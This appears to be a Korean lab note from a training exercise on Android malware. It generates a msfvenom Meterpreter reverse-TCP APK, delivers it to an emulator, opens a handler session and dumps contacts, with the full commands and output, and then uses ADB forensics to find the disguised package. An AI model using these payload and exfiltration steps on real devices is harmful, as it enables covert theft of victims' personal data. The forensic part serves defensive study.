# 4 안드로이드 해킹
[ 종합 침해사고 보고서 ]
안드로이드 악성 페이로드 침투 및 포렌식 추적 실습
개요 및 실습 목적
공격자( 해커 ) 관점에서 안드로이드 리버스 셸로 페이로드를 생성·전달하여 타겟 디바이스의 개인정보를 탈취하는 과정을 검증하고, 수사관( 짭새 ) 관점에서 위장된 악성 앱을 추적·특정하는 기법을 정립하기 위해 수행 한다
────────────────
통합 실습 및 포렌식 비슷한 환경 만들고 해보기
공격자 환경 : Kali (NAT 모드, TCP 4444 포트포워딩 매핑)
타겟 환경 (Target): Nox Player 에뮬레이터 (Android 12, x86_64)
네트워크 매핑 : 칼리 내부 IP: 10.0.2.15
바인딩/매핑 IP (LHOST): 192.168.0.215
수신 포트 (LPORT): 4444
공유 폴더 경로: /media/sf_ (호스트 윈도우 - 가상머신 간 매개 경로)
분석 도구: ADB
────────────────
공격 및 정보 탈취 수행 과정
→ 악성 페이로드(APK) 생성
→ msfvenom 도구를 활용하여 역방향 TCP 연결을 시도하는 안드로이드 설치 파일(sexy.apk)을 빌드 한다
┗ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.215 LPORT=4444 -o sexy.apk
────────────────
◈ 핵심 패러미터 및 팩트 ◈
-p android/meterpreter/reverse_tcp: 안드로이드 환경용 Meterpreter 리버스 TCP 스테이지 페이로드 지정.
LHOST=192.168.0.215: 타겟 기기가 역방향으로 접속할 공격자의 포트포워딩 외부 IP.
LPORT=4444: 리버스 세션을 수신할 공격자 바인딩 포트.
────────────────
공유 폴더를 통한 페이로드 전달 및 유포
생성된 APK 파일을 호스트 PC 및 Nox Player로 전달하기 위해
가상머신의 공유 폴더 디렉토리(/media/sf_)로 이동시킨다
# 1. /media 디렉토리 이동 및 파일 확인
cd /media
ls
# [출력] sexy.apk sf_
# 2. 공유 폴더로 파일 이동
sudo mv sexy.apk sf_/
# 3. 공유 폴더 진입 및 파일 교차 검증
cd sf_
ls
# [출력] mail서버로그 sexy.apk 레지스트리 레지스트리로그 이벤트로그 포렌식
────────────────
Metasploit 핸들러 리스너 대기 및 세션 수립
공격자 칼리 리눅스에서 들어오는 역접속 요청을 수신하기 위해 msfconsole 리스너를 동작
# Metasploit 실행 (정적 모드)
┗ msfconsole -q
# 핸들러 설정 및 수신 대기
┗ use exploit/multi/handler
┗ set payload android/meterpreter/reverse_tcp
┗ set LHOST 192.168.0.205
┗ set LPORT 4444
┗ run
[세션 연결 로그]
Plaintext
┗ [*] Started reverse TCP handler on 0.0.0.0:4444
┗ [*] Sending stage (72530 bytes) to 192.168.0.215
┗ [*] Meterpreter session 1 opened (10.0.2.15:4444 -> 192.168.0.215:61022) at 2026-08-06 02:28:55 -0400
────────────────
주소록 데이터 덤프 및 탈취수립된 Meterpreter 세션을
이용하여 타겟 단말기 내부 주소록 을 무단 추출
┗ Plaintextmeterpreter > dump_contacts
[*] Fetching 3 contacts into list
[*] Contacts list saved to: contacts_dump_20260806023040.txt
◈ 탈취된 연락처 데이터 검증 ◈
┗ cat contacts_dump_20260806023040.txt
메타 데이터
# 추출 일시: 2026-08-06 02:30:40.336443272 -0400
# 타겟 OS: Android 12 - Linux 5.4.40 (x86_64)
# 원격 타겟 IP/Port: 192.168.0.215:61022
▶ 김옥찌 010-5959-4848 단축 번호 형태 (피해자 본인 계정)
▶ 빵빵이 010-1234-5678 표준 휴대전화 번호
▶ 빵빵이 010-1234-5678 표준 휴대전화 번호
────────────────
분석 시나리오
피해자 '김옥찌' 는 주소록 유출로 인한 무차별 스팸 전화 폭주 피해를 입어서 미치겠음
단말기에는 90여 개의 앱이 깔려있었고, 악성 앱은 예:) ' 카카오톡 ' / 이상한 어플 이라는 정상 앱 이름으로 겉모습을 완벽히 위장하고 있어 눈으로 식별하는 것이 불가능 한 상황 일반인 또는 아니면 이미 모르고있는 경우가 엄청 많음
────────────────
ADB 덤프를 통한 증거
◈ ADB 통신 채널 수립 ◈
D:\platform-tools> adb connect 127.0.0.1:62026
connected to 127.0.0.1:62026
◈ 단말기 셸 진입 및 전체 패키지 리스트 덤프◈
D:\platform-tools> adb shell
x1q:/ # cd /data/local/tmp
x1q:/data/local/tmp # pm list packages > 1.txt
◈ 덤프 파일 PC로 인출 ◈
D:\platform-tools> adb pull /data/local/tmp/1.txt
/data/local/tmp/1.txt: 1 file pulled. 0.5 MB/s (3381 bytes in 0.006s)
────────────────
위장 앱의 분석
공격자가 앱 이름 및 아이콘을 '카카오톡'으로 100% 동일하게 위장하더라도, 안드로이드 OS의 고유 식별자인 패키지명 com.metasploit.stage는 공식 패키지명인 com.kakao.talk과 절대로 동일해질 수 없다는 점을 이용하여 악성 앱을 정밀 특정했다
카카오톡 카메라'로 위장했음에도 불필요한 READ_CONTACTS(주소록 접근) 권한을 백그라운드에서 활용한 점을 입증
C2 통신 및 탈취 행위
com.metasploit.stage 패키지 실행 직후 공격자 IP/Port(192.168.0.215:4444)로 세션이 연결되었으며
해당 세션을 통해 contacts_dump.txt가 유출된 인과관계를 완벽히 검증했다
종합 결론
공격 입증: msfvenom 기반 페이로드(sexy.apk)가 정상 앱으로 위장되어 피해자 단말기 내 설치되었고,
Reverse TCP 접속을 통해 내부 주소록 3건을 100% 무단 탈취
마지막으로 더 할수있지만 시간이 너무 촉박 하다 더 디테일 하게끔 볼수있는건 따로 시간 맞을때 해본다
이 노트는 로그인하지 않아도
열람할 수 있습니다.
작성·수정·삭제는
관리자 로그인
후 가능합니다.